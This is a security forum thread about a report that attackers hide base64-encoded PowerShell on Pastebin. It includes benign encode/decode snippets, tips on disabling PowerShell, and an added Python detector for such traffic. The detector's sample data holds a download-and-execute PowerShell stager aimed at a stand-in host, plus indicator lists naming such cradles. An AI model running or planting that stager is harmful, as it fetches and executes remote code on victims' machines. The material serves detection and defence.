Hackers hide base64-encoded PowerShell scripts on Pastebin

frogboy

Hackers are encoding malicious PowerShell scripts in base64 and hiding them on plain-text upload sites such as Pastebin, according to a new research report and accompanying blog post by threat intelligence firm Recorded Future.

The report, published on Wednesday, was inspired by a Nov. 17 law-enforcement bulletin that warned of a nation-state threat group attacking public and private entities using techniques that incorporate spear phishing, PowerShell and base64.

“In this case the attacker works on the reasonable assumption that individuals working closely with technology are not restricted in their access to text-based resources, like paste sites and code repositories,” wrote blog post author Chris Pace, Recorded Future's marketing and content director for the EMEA region. “They also take advantage of the fact that security at the web layer may not be able to decode and identify that this program is malicious.”

Using its own threat intelligence analytical engine, Recorded Future scoured online code repositories, paste sites and criminal forums for references to malicious PowerShell scripts leveraging Base64. Sure enough, the company encountered numerous examples of the specific technique being employed in the wild.

Full article: Hackers hide base64-encoded PowerShell scripts on Pastebin
 
Thanks for the share :)

Recently, I have seen a base36-encoded part (a-z 0-9) in the Malware vault.

"Recorded Future recommends setting up alerts for instances when base64-encoded strings and Pastebin URIs are collectively detected on network traffic"

By the time they are able to detect it, another base will be used :rolleyes:
The main advantage of Base64 encoding is that the result is a string made only of the characters A-Z a-z 0-9 + / (and = as a suffix character under certain conditions),
and it is easily encoded / decoded by PowerShell itself (no need for much code):

# Encode: take the bytes of the string in PowerShell's "Unicode" encoding (UTF-16LE), then Base64 them
$clear_text = "I am a bad person"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($clear_text)
$Base64_encoded_text = [Convert]::ToBase64String($Bytes)

$Base64_encoded_text   # only for the example, to see the result if you test
# => "SQAgAGEAbQAgAGEAIABiAGEAZAAgAHAAZQByAHMAbwBuAA=="

Just as short to decode:

# Decode: Base64 back to bytes, then bytes back to a string with the same Unicode (UTF-16LE) encoding
$Base64_encoded_text = "SQAgAGEAbQAgAGEAIABiAGEAZAAgAHAAZQByAHMAbwBuAA=="
$clear_text = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Base64_encoded_text))

$clear_text   # only for the example, to see the result if you test
# => "I am a bad person"

But in JavaScript / JScript / VBS used with Windows Script Host (not in a browser), it takes more steps.
 
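Detection logic for the Recorded Future recommendation quoted in the post above, as an added example that is not part of the post and not Recorded Future's own tooling. It is written in Python rather than PowerShell because it runs on the defender's side over captured traffic. The encode step reproduces the post's Unicode (UTF-16LE) + Base64 transform, which is also the format powershell.exe -EncodedCommand takes, and the scanner raises the combined alert only when a paste-site URI and a Base64 blob that decodes to PowerShell occur together. The paste-host list, the indicator strings, the sample exchanges, the paste IDs and the example.invalid download host are all constructed for this example. The last sample record illustrates the base36 caveat raised above: a run of a-z 0-9 characters also matches the Base64 alphabet, so matching on the alphabet alone is not enough and the decoded content has to be inspected.

```python
"""Flag HTTP exchanges where a paste-site URI and a Base64 blob that decodes
to PowerShell occur together (the Recorded Future alert quoted in the thread).
Added example; PASTE_HOSTS, PS_INDICATORS and the sample records are assumptions."""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import urlparse

# Only pastebin.com is named on the page; extend with other paste sites you care about.
PASTE_HOSTS = {"pastebin.com"}

# Base64 alphabet A-Z a-z 0-9 + / with optional '=' padding, as the post describes.
# A 40-character minimum keeps session IDs and short hashes out of the match.
BASE64_RE = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")

# Tokens that mark decoded text as PowerShell worth a second look (assumed list).
PS_INDICATORS = ("Invoke-Expression", "IEX", "New-Object", "Net.WebClient",
                 "DownloadString", "EncodedCommand", "Start-Process")


def encode_powershell(script: str) -> str:
    """UTF-16LE bytes, then Base64: the same transform as the post's
    [Text.Encoding]::Unicode.GetBytes + [Convert]::ToBase64String, and the
    format powershell.exe -EncodedCommand takes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_base64_text(token: str) -> list[tuple[str, str]]:
    """Every text decoding of a valid Base64 token, tagged with its codec.
    UTF-16LE is tried first (PowerShell's 'Unicode'); UTF-8 covers a plain
    .ps1 pasted as Base64. Both are returned because ASCII bytes also
    'decode' as UTF-16LE into meaningless CJK-range characters, so the
    caller must judge the content rather than the decodability."""
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return []
    decodings = []
    for codec in ("utf-16-le", "utf-8"):
        try:
            decodings.append((codec, raw.decode(codec)))
        except UnicodeDecodeError:
            pass
    return decodings


def powershell_indicators(text: str) -> list[str]:
    """Indicators present as whole tokens, case-insensitive like PowerShell itself."""
    return [ind for ind in PS_INDICATORS
            if re.search(r"(?<![\w-])" + re.escape(ind) + r"(?![\w-])",
                         text, re.IGNORECASE)]


def inspect_record(url: str, body: str) -> dict:
    """Evaluate one captured exchange: request URL plus response body."""
    host = (urlparse(url).hostname or "").lower()
    paste_site = any(host == h or host.endswith("." + h) for h in PASTE_HOSTS)
    findings = []
    for match in BASE64_RE.finditer(body):
        for codec, text in decode_base64_text(match.group(0)):
            hits = powershell_indicators(text)
            if hits:
                findings.append({"codec": codec, "indicators": hits,
                                 "preview": text[:60]})
                break
    return {"url": url, "paste_site": paste_site, "findings": findings,
            "alert": paste_site and bool(findings)}


def scan(records: list[tuple[str, str]]) -> list[dict]:
    return [inspect_record(url, body) for url, body in records]


def alerting_urls(records: list[tuple[str, str]]) -> list[str]:
    return [r["url"] for r in scan(records) if r["alert"]]


# Constructed sample exchanges (URL, response body); the paste IDs, the stager
# and the example.invalid download host are made up for this example.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_RECORDS = [
    ("https://pastebin.com/raw/AbCdEf12", encode_powershell(STAGER)),  # the pattern itself
    ("https://pastebin.com/raw/ZyXwVu98", "print('hello world')"),      # benign paste
    ("https://example.com/app.js", encode_powershell(STAGER)),          # payload, not a paste site
    ("https://pastebin.com/raw/Qq11Ww22",                                 # base36-looking run
     "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqr"),
]

if __name__ == "__main__":
    for result in scan(SAMPLE_RECORDS):
        print("ALERT" if result["alert"] else "ok   ", result["url"],
              "paste_site=%s findings=%s" % (result["paste_site"], result["findings"]))
```

Run it directly to print one line per record. Note the third record: a PowerShell payload served from a host that is not a paste site is still reported in findings but does not raise the combined alert, so in practice you would pair this rule with a separate one that fires on decoded PowerShell regardless of host, and you would feed it response bodies from a proxy or full-packet capture rather than URLs alone.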
Anyone know how to disable PowerShell for Win10 without using 3rd party software?

I tried disabling via add-remove features, then registry edits (which I think I did correctly)...nothing works due to what appears to be a Win10 bug. Only thing I could do via registry was make PowerShell access restricted.
 
"I tried disabling via add-remove features"

=> You have tried it like in the screenshot, without success?

[screenshot: Sans titre.jpg]
 
^Yeah, I tried it just like in the screen shot, Powershell is still there and working. "Turn Windows features on and off".

That is when I went to registry edits, it still works after that too. Finally I just made it restricted.
 
I had the same problem as you.
The only way that worked for me was to rename the various powershell.exe files (there are 4 of them) to a different name, such as powershell.old.exe. If you do that, I think that the malware will not be able to find it.

But when you get a Windows update, you have to check if powershell was re-installed. Because lately, Microsoft has been working on Powershell, and they push updates.

EDIT: you can just delete them entirely, but then, if you need to use them for some reason, you have a problem.
 

Thanks, I will rename the files.